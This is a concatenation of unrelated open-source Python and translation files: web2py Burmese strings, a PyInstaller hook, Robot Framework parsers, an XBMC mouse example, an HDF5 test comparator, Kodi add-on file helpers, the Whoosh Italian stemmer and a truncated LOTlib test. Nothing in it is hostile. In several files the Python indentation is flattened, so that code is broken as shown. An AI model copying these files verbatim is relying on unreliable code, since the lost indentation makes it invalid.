'please input your password again': 'ကျေးဇူးပြု၍ စကားဝှက်ကို ထပ်မံ ဖြည့်သွင်းပေးပါ',
'Plugins': 'Plugins',
'plugins': 'plugins',
'Plural-Forms:': 'Plural-Forms:',
'Powered by': 'အားဖြည့်စွမ်းအားပေးသူ',
'Preface': 'နိဒါန်း',
'previous %s rows': 'previous %s rows',
'Private files': 'Private files',
'private files': 'private files',
'pygraphviz library not found': 'pygraphviz library ကို မတွေ့ပါ',
'Python': 'Python',
'Query:': 'Query:',
'Quick Examples': 'အမြန် အသုံးပြုနိုင်သော နမူနာများ',
'RAM': 'RAM',
'RAM Cache Keys': 'RAM Cache Keys',
'Ram Cleared': 'Ram ရှင်းလင်းပြီးပြီ',
'Recipes': 'Recipes',
'Record': 'မှတ်တမ်း',
'record does not exist': 'မှတ်တမ်း မရှိပါ',
'Record ID': 'Record ID',
'Record id': 'Record id',
'Register': 'မှတ်ပုံတင်ရန်',
'Registration identifier': 'Registration identifier',
'Registration key': 'Registration key',
'Reload routes': 'Reload routes',
'Remember me (for 30 days)': 'Remember me (for 30 days)',
'Request reset password': 'စကားဝှက် အသစ် တောင်းဆိုရန်',
'Reset Password key': 'Reset Password key',
'Role': 'Role',
'Roles': 'Roles',
'Rows in Table': 'Rows in Table',
'Rows selected': 'ရွေးထားသော အတန်းများ',
"Run tests in this file (to run all files, you may also use the button labelled 'test')": "Run tests in this file (to run all files, you may also use the button labelled 'test')",
'Running on %s': 'Running on %s',
'Save model as...': 'Save model as...',
'Semantic': 'Semantic',
'Services': 'Services',
'shell': 'shell',
'Site': 'Site',
'Size of cache:': 'Size of cache:',
'Start wizard': 'Start wizard',
'state': 'state',
'static': 'static',
'Static': 'Static',
'Statistics': 'ကိန်းဂဏန်း အချက်အလက်များ',
'Stylesheet': 'Stylesheet',
'submit': 'ပြုလုပ်ပါ',
'Submit': 'Submit',
'Support': 'အထောက်အပံ့',
'Table': 'ဇယား',
'test': 'test',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.',
'The application logic, each URL path is mapped in one exposed function in the controller': 'The application logic, each URL path is mapped in one exposed function in the controller',
'The Core': 'The Core',
'The data representation, define database tables and sets': 'The data representation, define database tables and sets',
'The output of the file is a dictionary that was rendered by the view %s': 'The output of the file is a dictionary that was rendered by the view %s',
'The presentations layer, views are also known as templates': 'The presentations layer, views are also known as templates',
'The Views': 'The Views',
'There are no plugins': 'There are no plugins',
'There are no private files': 'There are no private files',
'These files are not served, they are only available from within your app': 'These files are not served, they are only available from within your app',
'These files are served without processing, your images go here': 'These files are served without processing, your images go here',
'This App': 'ဒီ App',
'This email already has an account': 'ဒီအီးမေးလ်တွင် အကောင့် ရှိပြီး ဖြစ်ပါသည်',
'Time in Cache (h:m:s)': 'Time in Cache (h:m:s)',
'Timestamp': 'Timestamp',
'To create a plugin, name a file/folder plugin_[name]': 'To create a plugin, name a file/folder plugin_[name]',
'Traceback': 'Traceback',
'Translation strings for the application': 'Translation strings for the application',
'Try the mobile interface': 'Try the mobile interface',
'Twitter': 'Twitter',
'unable to parse csv file': 'unable to parse csv file',
'Uninstall': 'Uninstall',
'update all languages': 'update all languages',
'Update:': 'Update:',
'Upload': 'Upload',
'Upload a package:': 'Upload a package:',
'Upload and install packed application': 'Upload and install packed application',
'upload file:': 'upload file:',
'upload plugin file:': 'upload plugin file:',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.',
'User': 'အသုံးပြုသူ',
'User ID': 'User ID',
'Users': 'အသုံးပြုသူများ',
'Verify Password': 'စကားဝှက်ကို အတည်ပြုပါ',
'Version': 'Version',
'Versioning': 'Versioning',
'Videos': 'ဗွီဒီယိုများ',
'View': 'ဗျူး',
'views': 'views',
'Views': 'ဗျူးများ',
'Web Framework': 'Web Framework',
'Welcome': 'ကြိုဆိုပါ၏',
'Welcome to web2py!': 'web2py မှ ကြိုဆိုပါသည်။',
'Which called the function %s located in the file %s': 'Which called the function %s located in the file %s',
'Working...': 'ဆောင်ရွက်နေပါသည် ။ ။ ။',
'You are successfully running web2py': 'သင်သည် web2py ကို အောင်မြင်စွာ လည်ပတ်မောင်းနှင်စေပါသည်။',
'You can modify this application and adapt it to your needs': 'သင် ဒီ application ကို ပြုပြင်မွမ်းမံနိုင်ပါသည်။ ထို့အပြင် သင့်လိုအပ်ချက်များနှင့် ကိုက်ညီစေရန် ပြုလုပ်နိုင်ပါသည်။',
'You visited the url %s': 'သင် လည်ပတ်ခဲ့သော URL %s',
'စကားဝှက် အသစ် တောင်းဆိုရန်': 'စကားဝှက် အသစ် တောင်းဆိုရန်',
'မှတ်ပုံတင်ရန်': 'မှတ်ပုံတင်ရန်',
'ဝင်ရောက်အသုံးပြုရန်': 'ဝင်ရောက်အသုံးပြုရန်',
}
|
akhof/PySaved | refs/heads/master | PySaved/src/PyInstaller/hooks/hook-xml.dom.py | 10 | #-----------------------------------------------------------------------------
# Copyright (c) 2013, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License with exception
# for distributing bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
attrs = [('Node', 0),
('INDEX_SIZE_ERR', 1),
('DOMSTRING_SIZE_ERR', 2),
('HIERARCHY_REQUEST_ERR', 3),
('WRONG_DOCUMENT_ERR', 4),
         ('INVALID_CHARACTER_ERR', 5),
('NO_DATA_ALLOWED_ERR', 6),
('NO_MODIFICATION_ALLOWED_ERR', 7),
('NOT_FOUND_ERR', 8),
('NOT_SUPPORTED_ERR', 9),
('INUSE_ATTRIBUTE_ERR', 10),
('INVALID_STATE_ERR', 11),
('SYNTAX_ERR', 12),
('INVALID_MODIFICATION_ERR', 13),
('NAMESPACE_ERR', 14),
('INVALID_ACCESS_ERR', 15),
('DOMException', 0),
('IndexSizeErr', 0),
('DomstringSizeErr', 0),
('HierarchyRequestErr', 0),
('WrongDocumentErr', 0),
('InvalidCharacterErr', 0),
('NoDataAllowedErr', 0),
('NoModificationAllowedErr', 0),
('NotFoundErr', 0),
('NotSupportedErr', 0),
('InuseAttributeErr', 0),
('InvalidStateErr', 0),
('SyntaxErr', 0),
('InvalidModificationErr', 0),
('NamespaceErr', 0),
('InvalidAccessErr', 0),
('getDOMImplementation', 0),
('registerDOMImplementation', 0),
]
def hook(mod):
if mod.__file__.find('_xmlplus') > -1:
mod.UNSPECIFIED_EVENT_TYPE_ERR = 0
mod.FT_EXCEPTION_BASE = 1000
mod.XML_PARSE_ERR = 1001
mod.BAD_BOUNDARYPOINTS_ERR = 1
mod.INVALID_NODE_TYPE_ERR = 2
mod.EventException = None
mod.RangeException = None
mod.FtException = None
if hasattr(mod, 'DomstringSizeErr'):
del mod.DomstringSizeErr
mod.DOMStringSizeErr = None
mod.UnspecifiedEventTypeErr = None
mod.XmlParseErr = None
mod.BadBoundaryPointsErr = None
mod.InvalidNodeTypeErr = None
mod.DOMImplementation = None
mod.implementation = None
mod.XML_NAMESPACE = None
mod.XMLNS_NAMESPACE = None
mod.XHTML_NAMESPACE = None
mod.DOMExceptionStrings = None
mod.EventExceptionStrings = None
mod.FtExceptionStrings = None
mod.RangeExceptionStrings = None
return mod
|
Senseg/robotframework | refs/heads/master | src/robot/parsing/tablepopulators.py | 1 | # Copyright 2008-2012 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from robot.parsing.settings import Documentation, MetadataList
class Populator(object):
"""Explicit interface for all populators."""
def add(self, row): raise NotImplementedError()
def populate(self): raise NotImplementedError()
class CommentCacher(object):
def __init__(self):
self._init_comments()
def _init_comments(self):
self._comments = []
def add(self, comment):
self._comments.append(comment)
def consume_comments_with(self, function):
for c in self._comments:
function(c)
self._init_comments()
class _TablePopulator(Populator):
def __init__(self, table):
self._table = table
self._populator = NullPopulator()
self._comments = CommentCacher()
def add(self, row):
if self._is_cacheable_comment_row(row):
self._comments.add(row)
else:
self._add(row)
def _add(self, row):
if not self._is_continuing(row):
self._populator.populate()
self._populator = self._get_populator(row)
self._comments.consume_comments_with(self._populator.add)
self._populator.add(row)
def populate(self):
self._comments.consume_comments_with(self._populator.add)
self._populator.populate()
def _is_continuing(self, row):
return row.is_continuing() and self._populator
def _is_cacheable_comment_row(self, row):
return row.is_commented()
class SettingTablePopulator(_TablePopulator):
def _get_populator(self, row):
row.handle_old_style_metadata()
setter = self._table.get_setter(row.head)
if not setter:
return NullPopulator()
if setter.im_class is Documentation:
return DocumentationPopulator(setter)
if setter.im_class is MetadataList:
return MetadataPopulator(setter)
return SettingPopulator(setter)
class VariableTablePopulator(_TablePopulator):
def _get_populator(self, row):
return VariablePopulator(self._table.add, row.head)
class _StepContainingTablePopulator(_TablePopulator):
def _is_continuing(self, row):
return row.is_indented() and self._populator or row.is_commented()
def _is_cacheable_comment_row(self, row):
return row.is_commented() and isinstance(self._populator, NullPopulator)
class TestTablePopulator(_StepContainingTablePopulator):
def _get_populator(self, row):
return TestCasePopulator(self._table.add)
class KeywordTablePopulator(_StepContainingTablePopulator):
def _get_populator(self, row):
return UserKeywordPopulator(self._table.add)
class ForLoopPopulator(Populator):
def __init__(self, for_loop_creator):
self._for_loop_creator = for_loop_creator
self._loop = None
self._populator = NullPopulator()
self._declaration = []
def add(self, row):
dedented_row = row.dedent()
if not self._loop:
declaration_ready = self._populate_declaration(row)
if not declaration_ready:
return
self._loop = self._for_loop_creator(self._declaration)
if not row.is_continuing():
self._populator.populate()
self._populator = StepPopulator(self._loop.add_step)
self._populator.add(dedented_row)
def _populate_declaration(self, row):
if row.starts_for_loop() or row.is_continuing():
self._declaration.extend(row.dedent().data)
return False
return True
def populate(self):
if not self._loop:
self._for_loop_creator(self._declaration)
self._populator.populate()
class _TestCaseUserKeywordPopulator(Populator):
def __init__(self, test_or_uk_creator):
self._test_or_uk_creator = test_or_uk_creator
self._test_or_uk = None
self._populator = NullPopulator()
self._comments = CommentCacher()
def add(self, row):
if row.is_commented():
self._comments.add(row)
return
if not self._test_or_uk:
self._test_or_uk = self._test_or_uk_creator(row.head)
dedented_row = row.dedent()
if dedented_row:
self._handle_data_row(dedented_row)
def _handle_data_row(self, row):
if not self._continues(row):
self._populator.populate()
self._populator = self._get_populator(row)
self._flush_comments_with(self._populate_comment_row)
else:
self._flush_comments_with(self._populator.add)
self._populator.add(row)
def _populate_comment_row(self, crow):
populator = StepPopulator(self._test_or_uk.add_step)
populator.add(crow)
populator.populate()
def _flush_comments_with(self, function):
self._comments.consume_comments_with(function)
def populate(self):
self._populator.populate()
self._flush_comments_with(self._populate_comment_row)
def _get_populator(self, row):
if row.starts_test_or_user_keyword_setting():
setter = self._setting_setter(row)
if not setter:
return NullPopulator()
if setter.im_class is Documentation:
return DocumentationPopulator(setter)
return SettingPopulator(setter)
if row.starts_for_loop():
return ForLoopPopulator(self._test_or_uk.add_for_loop)
return StepPopulator(self._test_or_uk.add_step)
def _continues(self, row):
return row.is_continuing() and self._populator or \
(isinstance(self._populator, ForLoopPopulator) and row.is_indented())
def _setting_setter(self, row):
setting_name = row.test_or_user_keyword_setting_name()
return self._test_or_uk.get_setter(setting_name)
class TestCasePopulator(_TestCaseUserKeywordPopulator):
_item_type = 'test case'
class UserKeywordPopulator(_TestCaseUserKeywordPopulator):
_item_type = 'keyword'
class Comments(object):
def __init__(self):
self._comments = []
def add(self, row):
if row.comments:
self._comments.extend(c.strip() for c in row.comments if c.strip())
@property
def value(self):
return self._comments
class _PropertyPopulator(Populator):
def __init__(self, setter):
self._setter = setter
self._value = []
self._comments = Comments()
def add(self, row):
if not row.is_commented():
self._add(row)
self._comments.add(row)
def _add(self, row):
self._value.extend(row.dedent().data)
class VariablePopulator(_PropertyPopulator):
def __init__(self, setter, name):
_PropertyPopulator.__init__(self, setter)
self._name = name
def populate(self):
self._setter(self._name, self._value,
self._comments.value)
class SettingPopulator(_PropertyPopulator):
def populate(self):
self._setter(self._value, self._comments.value)
class DocumentationPopulator(_PropertyPopulator):
_end_of_line_escapes = re.compile(r'(\\+)n?$')
def populate(self):
self._setter(self._value, self._comments.value)
def _add(self, row):
self._add_to_value(row.dedent().data)
def _add_to_value(self, data):
joiner = self._row_joiner()
if joiner:
self._value.append(joiner)
self._value.append(' '.join(data))
def _row_joiner(self):
if self._is_empty():
return None
return self._joiner_based_on_eol_escapes()
def _is_empty(self):
return not self._value or \
(len(self._value) == 1 and self._value[0] == '')
    def _joiner_based_on_eol_escapes(self):
        match = self._end_of_line_escapes.search(self._value[-1])
        if not match or len(match.group(1)) % 2 == 0:
            # No trailing escape, or the backslashes escape each other:
            # join documentation rows with a literal newline.
            return '\\n'
        if not match.group(0).endswith('n'):
            # The row ends with a lone `\` -> explicit continuation,
            # join with a space.
            return ' '
        # The row already ends with an escaped newline (`\n`) -> no joiner.
        return None
class MetadataPopulator(DocumentationPopulator):
def __init__(self, setter):
_PropertyPopulator.__init__(self, setter)
self._name = None
def populate(self):
self._setter(self._name, self._value, self._comments.value)
def _add(self, row):
data = row.dedent().data
if self._name is None:
self._name = data[0] if data else ''
data = data[1:]
self._add_to_value(data)
class StepPopulator(_PropertyPopulator):
def _add(self, row):
self._value.extend(row.data)
def populate(self):
if self._value or self._comments:
self._setter(self._value, self._comments.value)
class NullPopulator(Populator):
def add(self, row): pass
def populate(self): pass
def __nonzero__(self): return False
|
Voyager1/xbmc | refs/heads/master | tools/EventClients/examples/python/example_mouse.py | 262 | #!/usr/bin/python
# This is a simple example showing how you can send mouse movement
# events to XBMC.
# NOTE: Read the comments in 'example_button1.py' for a more detailed
# explanation.
import sys
sys.path.append("../../lib/python")
from xbmcclient import *
from socket import *
def main():
import time
import sys
host = "localhost"
port = 9777
addr = (host, port)
sock = socket(AF_INET,SOCK_DGRAM)
# First packet must be HELO and can contain an icon
packet = PacketHELO("Example Mouse", ICON_PNG,
"../../icons/mouse.png")
packet.send(sock, addr)
# wait for notification window to close (in XBMC)
time.sleep(2)
# send mouse events to take cursor from top left to bottom right of the screen
# here 0 to 65535 will map to XBMC's screen width and height.
# Specifying absolute mouse coordinates is unsupported currently.
for i in range(0, 65535, 2):
packet = PacketMOUSE(i,i)
packet.send(sock, addr)
# ok we're done, close the connection
packet = PacketBYE()
packet.send(sock, addr)
if __name__=="__main__":
main()
|
BorisJeremic/Real-ESSI-Examples | refs/heads/master | analytic_solution/test_cases/8NodeBrick/cantilever_irregular_element_with_divisions/shape3/NumberOfDivision4/vertical_load/compare_HDF5_ALL.py | 424 | #!/usr/bin/python
import h5py
import sys
import numpy as np
import os
import re
import random
# find the path to my own python function:
cur_dir=os.getcwd()
sep='test_cases'
test_DIR=cur_dir.split(sep,1)[0]
scriptDIR=test_DIR+'compare_function'
sys.path.append(scriptDIR)
# import my own function for color and comparator
from mycomparator import *
from mycolor_fun import *
# the real essi hdf5 results
h5_result_new = sys.argv[1]
h5_result_ori = sys.argv[2]
disp_pass_or_fail=h5diff_disp(h5_result_ori,h5_result_new)
Gauss_pass_or_fail = 1
try:
Gauss_pass_or_fail=h5diff_Gauss_output(h5_result_ori,h5_result_new)
except KeyError:
pass
Element_Output_pass_or_fail = 1
try:
Element_Output_pass_or_fail=h5diff_Element_output(h5_result_ori,h5_result_new)
except KeyError:
pass
if disp_pass_or_fail and Gauss_pass_or_fail and Element_Output_pass_or_fail:
print headOK(), "All hdf5 results are the same."
print headOKCASE(),"-----------Done this case!-----------------"
else:
if disp_pass_or_fail==0:
print headFailed(),"-----------Displacement has mismatches!-----------------"
if Gauss_pass_or_fail==0:
print headFailed(),"-----------StressStrain has mismatches!-----------------"
if Element_Output_pass_or_fail==0:
print headFailed(),"-----------Element output has mismatches!-----------------"
# # The allowable tolerance between the ori_vals and new_vals values.
# tolerance=1e-5
# machine_epsilon=1e-16
# ori_vals=[]
# new_vals=[]
# ori_vals.append(find_max_disp(h5_result_ori,0))
# new_vals.append(find_max_disp(h5_result_new,0))
# # if multiple steps, compare the max_disp of random steps
# Nstep = find_disp_Nstep(h5_result_ori)
# if Nstep>5 :
# for i in xrange(1,4):
# test_step=random.randint(1,Nstep-1)
# ori_vals.append(find_max_disp(h5_result_ori,test_step))
# new_vals.append(find_max_disp(h5_result_new,test_step))
# # calculate the errors
# errors=[]
# for index, x in enumerate(ori_vals):
# if(abs(x))>machine_epsilon:
# errors.append(abs((new_vals[index]-x)/x))
# else:
# errors.append(machine_epsilon)
# # compare and form the flags
# flags=[]
# for item in errors:
# if abs(item)<tolerance:
# flags.append('pass')
# else:
# flags.append('failed')
# # print the results
# case_flag=1
# print headrun() , "-----------Testing results-----------------"
# print headstep() ,'{0} {1} {2} {3}'.format('back_value ','new_value ','error ','flag')
# for index, x in enumerate(errors):
# if(abs(x)<tolerance):
# print headOK() ,'{0:e} {1:e} {2:0.2f} {3}'.format(ori_vals[index],new_vals[index], x, flags[index] )
# else:
# case_flag=0
# print headFailed() ,'{0:e} {1:e} {2:0.2f} {3}'.format(ori_vals[index],new_vals[index], x, flags[index] )
# if(case_flag==1):
# print headOKCASE(),"-----------Done this case!-----------------"
# legacy backup
# automatically find the script directory.
# sys.path.append("/home/yuan/Dropbox/3essi_self_verification/test_suite/scripts" )
# script_dir=sys.argv[1]
# print headstart() , "Running test cases..."
# print headlocation(), os.path.dirname(os.path.abspath(__file__))
# file_in=open("ori_vals_values.txt","r")
# Input the 1st line, which is the ori_vals value.
# ori_vals= float(file_in.readline())
# Input the 2nd line, which is the HDF5 output filename.
# new_vals=find_max_disp(file_in.readline());
# file_in.close() |
Coelhon/MasterRepo.repository | refs/heads/master | plugin.video.SportsDevil-2016.12.31/lib/utils/fileUtils.py | 15 | # -*- coding: utf-8 -*-
import os
import datetime, time
import random
import hashlib
import codecs
#######################################
# File Helpers
#######################################
def fileExists(filename):
return os.path.isfile(filename)
def getFileExtension(filename):
ext_pos = filename.rfind('.')
if ext_pos != -1:
return filename[ext_pos+1:]
else:
return ''
def get_immediate_subdirectories(directory):
return [name for name in os.listdir(directory)
if os.path.isdir(os.path.join(directory, name))]
def findInSubdirectory(filename, subdirectory=''):
if subdirectory:
path = subdirectory
else:
path = os.getcwd()
for root, _, names in os.walk(path):
if filename in names:
return os.path.join(root, filename)
    raise IOError('File not found: %s' % filename)
def cleanFilename(s):
if not s:
return ''
badchars = '\\/:*?\"<>|'
for c in badchars:
s = s.replace(c, '')
    return s
def randomFilename(directory, chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', length = 8, prefix = '', suffix = '', attempts = 10000):
for _ in range(attempts):
filename = ''.join([random.choice(chars) for _ in range(length)])
filename = prefix + filename + suffix
if not os.path.exists(os.path.join(directory, filename)):
return filename
return None
def getFileContent(filename):
try:
f = codecs.open(filename,'r','utf-8')
txt = f.read()
f.close()
return txt
except:
return ''
def setFileContent(filename, txt, createFolders=False):
try:
if createFolders:
folderPath = os.path.dirname(filename)
if not os.path.exists(folderPath):
os.makedirs(folderPath, 0777)
f = codecs.open(filename, 'w','utf-8')
f.write(txt)
f.close()
return True
except:
return False
def appendFileContent(filename, txt):
try:
f = codecs.open(filename, 'a','utf-8')
f.write(txt)
f.close()
return True
except:
return False
def md5(fileName, excludeLine="", includeLine=""):
"""Compute md5 hash of the specified file"""
m = hashlib.md5()
try:
        fd = open(fileName, "rb")
except IOError:
#print "Unable to open the file in readmode:", fileName
return
content = fd.readlines()
fd.close()
for eachLine in content:
if excludeLine and eachLine.startswith(excludeLine):
continue
m.update(eachLine)
m.update(includeLine)
return m.hexdigest()
def lastModifiedAt(path):
return datetime.datetime.utcfromtimestamp(os.path.getmtime(path))
def setLastModifiedAt(path, date):
try:
stinfo = os.stat(path)
atime = stinfo.st_atime
mtime = int(time.mktime(date.timetuple()))
os.utime(path, (atime, mtime))
return True
except:
pass
return False
def checkQuota(directory, limit=200*1024):
total_size = 0
for root, dirs, files in os.walk(directory, topdown=False):
for name in files:
total_size += os.path.getsize(os.path.join(root, name))
if total_size > limit:
return limit, False
return total_size, True
def clearDirectory(path):
try:
for root, _, files in os.walk(path , topdown = False):
for name in files:
os.remove(os.path.join(root, name))
except:
return False
return True
# http://akiscode.com/articles/sha-1directoryhash.shtml
# Copyright (c) 2009 Stephen Akiki
# MIT License (Means you can do whatever you want with this)
# See http://www.opensource.org/licenses/mit-license.php
# Error Codes:
# -1 -> Directory does not exist
# -2 -> General error (see stack traceback)
def GetHashofDirs(directory, verbose=0):
SHAhash = hashlib.sha1()
if not os.path.exists (directory):
return -1
try:
for root, _, files in os.walk(directory):
for names in files:
#if verbose == 1:
#print 'Hashing', names
filepath = os.path.join(root,names)
try:
                    f1 = open(filepath, 'rb')
                except IOError:
                    # You can't open the file for some reason
                    continue
while 1:
# Read file in as little chunks
buf = f1.read(4096)
if not buf:
break
SHAhash.update(hashlib.sha1(buf).hexdigest())
f1.close()
except:
import traceback
# Print the stack traceback
traceback.print_exc()
return -2
return SHAhash.hexdigest()
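# Illustrative usage sketch (an addition to the original helpers; the paths
# and values are assumptions):
#
#   name = randomFilename('/tmp', prefix='cache_', suffix='.txt')
#   setFileContent('/tmp/' + name, u'hello', createFolders=True)
#   used, ok = checkQuota('/tmp', limit=200 * 1024)  # bytes used, under limit?
#   digest = GetHashofDirs('/tmp')                   # sha1 over all files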
|
vbshah1992/microblog | refs/heads/master | flask/lib/python2.7/site-packages/whoosh/lang/snowball/italian.py | 96 | from .bases import _StandardStemmer
from whoosh.compat import u
class ItalianStemmer(_StandardStemmer):
"""
The Italian Snowball stemmer.
:cvar __vowels: The Italian vowels.
:type __vowels: unicode
:cvar __step0_suffixes: Suffixes to be deleted in step 0 of the algorithm.
:type __step0_suffixes: tuple
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
:type __step2_suffixes: tuple
:note: A detailed description of the Italian
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/italian/stemmer.html
"""
__vowels = u("aeiou\xE0\xE8\xEC\xF2\xF9")
__step0_suffixes = ('gliela', 'gliele', 'glieli', 'glielo',
'gliene', 'sene', 'mela', 'mele', 'meli',
'melo', 'mene', 'tela', 'tele', 'teli',
'telo', 'tene', 'cela', 'cele', 'celi',
'celo', 'cene', 'vela', 'vele', 'veli',
'velo', 'vene', 'gli', 'ci', 'la', 'le',
'li', 'lo', 'mi', 'ne', 'si', 'ti', 'vi')
__step1_suffixes = ('atrice', 'atrici', 'azione', 'azioni',
'uzione', 'uzioni', 'usione', 'usioni',
'amento', 'amenti', 'imento', 'imenti',
'amente', 'abile', 'abili', 'ibile', 'ibili',
'mente', 'atore', 'atori', 'logia', 'logie',
'anza', 'anze', 'iche', 'ichi', 'ismo',
'ismi', 'ista', 'iste', 'isti', u('ist\xE0'),
u('ist\xE8'), u('ist\xEC'), 'ante', 'anti',
'enza', 'enze', 'ico', 'ici', 'ica', 'ice',
'oso', 'osi', 'osa', 'ose', u('it\xE0'),
'ivo', 'ivi', 'iva', 'ive')
__step2_suffixes = ('erebbero', 'irebbero', 'assero', 'assimo',
'eranno', 'erebbe', 'eremmo', 'ereste',
'eresti', 'essero', 'iranno', 'irebbe',
'iremmo', 'ireste', 'iresti', 'iscano',
'iscono', 'issero', 'arono', 'avamo', 'avano',
'avate', 'eremo', 'erete', 'erono', 'evamo',
'evano', 'evate', 'iremo', 'irete', 'irono',
'ivamo', 'ivano', 'ivate', 'ammo', 'ando',
'asse', 'assi', 'emmo', 'enda', 'ende',
'endi', 'endo', 'erai', 'erei', 'Yamo',
'iamo', 'immo', 'irai', 'irei', 'isca',
'isce', 'isci', 'isco', 'ano', 'are', 'ata',
'ate', 'ati', 'ato', 'ava', 'avi', 'avo',
u('er\xE0'), 'ere', u('er\xF2'), 'ete', 'eva',
'evi', 'evo', u('ir\xE0'), 'ire', u('ir\xF2'),
'ita', 'ite', 'iti', 'ito', 'iva', 'ivi',
'ivo', 'ono', 'uta', 'ute', 'uti', 'uto',
'ar', 'ir')
def stem(self, word):
"""
Stem an Italian word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
step1_success = False
# All acute accents are replaced by grave accents.
word = (word.replace(u("\xE1"), u("\xE0"))
.replace(u("\xE9"), u("\xE8"))
.replace(u("\xED"), u("\xEC"))
.replace(u("\xF3"), u("\xF2"))
.replace(u("\xFA"), u("\xF9")))
# Every occurrence of 'u' after 'q'
# is put into upper case.
for i in range(1, len(word)):
if word[i - 1] == "q" and word[i] == "u":
word = "".join((word[:i], "U", word[i + 1:]))
# Every occurrence of 'u' and 'i'
# between vowels is put into upper case.
for i in range(1, len(word) - 1):
if word[i - 1] in self.__vowels and word[i + 1] in self.__vowels:
if word[i] == "u":
word = "".join((word[:i], "U", word[i + 1:]))
elif word[i] == "i":
word = "".join((word[:i], "I", word[i + 1:]))
r1, r2 = self._r1r2_standard(word, self.__vowels)
rv = self._rv_standard(word, self.__vowels)
# STEP 0: Attached pronoun
for suffix in self.__step0_suffixes:
if rv.endswith(suffix):
if rv[-len(suffix) - 4:-len(suffix)] in ("ando", "endo"):
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
elif (rv[-len(suffix) - 2:-len(suffix)] in
("ar", "er", "ir")):
word = "".join((word[:-len(suffix)], "e"))
r1 = "".join((r1[:-len(suffix)], "e"))
r2 = "".join((r2[:-len(suffix)], "e"))
rv = "".join((rv[:-len(suffix)], "e"))
break
# STEP 1: Standard suffix removal
for suffix in self.__step1_suffixes:
if word.endswith(suffix):
if suffix == "amente" and r1.endswith(suffix):
step1_success = True
word = word[:-6]
r2 = r2[:-6]
rv = rv[:-6]
if r2.endswith("iv"):
word = word[:-2]
r2 = r2[:-2]
rv = rv[:-2]
if r2.endswith("at"):
word = word[:-2]
rv = rv[:-2]
elif r2.endswith(("os", "ic")):
word = word[:-2]
rv = rv[:-2]
                    elif r2.endswith("abil"):
word = word[:-4]
rv = rv[:-4]
elif (suffix in ("amento", "amenti",
"imento", "imenti") and
rv.endswith(suffix)):
step1_success = True
word = word[:-6]
rv = rv[:-6]
elif r2.endswith(suffix):
step1_success = True
if suffix in ("azione", "azioni", "atore", "atori"):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
if r2.endswith("ic"):
word = word[:-2]
rv = rv[:-2]
elif suffix in ("logia", "logie"):
word = word[:-2]
rv = word[:-2]
elif suffix in ("uzione", "uzioni",
"usione", "usioni"):
word = word[:-5]
rv = rv[:-5]
elif suffix in ("enza", "enze"):
word = "".join((word[:-2], "te"))
rv = "".join((rv[:-2], "te"))
elif suffix == u("it\xE0"):
word = word[:-3]
r2 = r2[:-3]
rv = rv[:-3]
if r2.endswith(("ic", "iv")):
word = word[:-2]
rv = rv[:-2]
elif r2.endswith("abil"):
word = word[:-4]
rv = rv[:-4]
elif suffix in ("ivo", "ivi", "iva", "ive"):
word = word[:-3]
r2 = r2[:-3]
rv = rv[:-3]
if r2.endswith("at"):
word = word[:-2]
r2 = r2[:-2]
rv = rv[:-2]
if r2.endswith("ic"):
word = word[:-2]
rv = rv[:-2]
else:
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
break
# STEP 2: Verb suffixes
if not step1_success:
for suffix in self.__step2_suffixes:
if rv.endswith(suffix):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
break
# STEP 3a
if rv.endswith(("a", "e", "i", "o", u("\xE0"), u("\xE8"),
u("\xEC"), u("\xF2"))):
word = word[:-1]
rv = rv[:-1]
if rv.endswith("i"):
word = word[:-1]
rv = rv[:-1]
# STEP 3b
if rv.endswith(("ch", "gh")):
word = word[:-1]
word = word.replace("I", "i").replace("U", "u")
return word
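# Illustrative usage sketch (an addition, not part of the original class):
#
#   stemmer = ItalianStemmer()
#   stemmer.stem(u('abbandonata'))  # strips the suffix, e.g. -> u'abbandon'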
|
ebigelow/LOTlib | refs/heads/master | LOTlib/Testing/old/MiscellaneousTest.py | 2 | """
class to test Miscellaneous.py
follows the standards in https://docs.python.org/2/library/unittest.html
"""
import types
import unittest
from LOTlib.Miscellaneous import *
class MiscellaneousTest(unittest.TestCase):
# initialization that happens before each test is carried out
def setUp(self):
self.array = [10,9,8,7,6,5,4,3,2,1]
# tests the first, second, ... functions
def test_number_functions(self):
self.assertEqual(first(self.array), 10)
self.assertEqual(second(self.array), 9)
self.assertEqual(third(self.array), 8)
self.assertEqual(fourth(self.array), 7)
self.assertEqual(fifth(self.array), 6)
self.assertEqual(sixth(self.array), 5)
self.assertEqual(seventh(self.array), 4)
self.assertEqual(eighth(self.array), 3)
self.assertTrue(isinstance(dropfirst(self.array), types.GeneratorType))
def test_None2Empty(self):
none = None
# Treat Nones as empty
self.assertEqual(None2Empty(none), [])
self.assertEqual(None2Empty(self.array), self.array)
# def test_make_mutable(self):
# # TODO: update with other types
# if isinstance(x, frozenset): return set(x)
# elif isinstance(x, tuple): return list(x)
# else: return x
# def test_make_immutable(self):
# # TODO: update with other types
# if isinstance(x, set ): return frozenset(x)
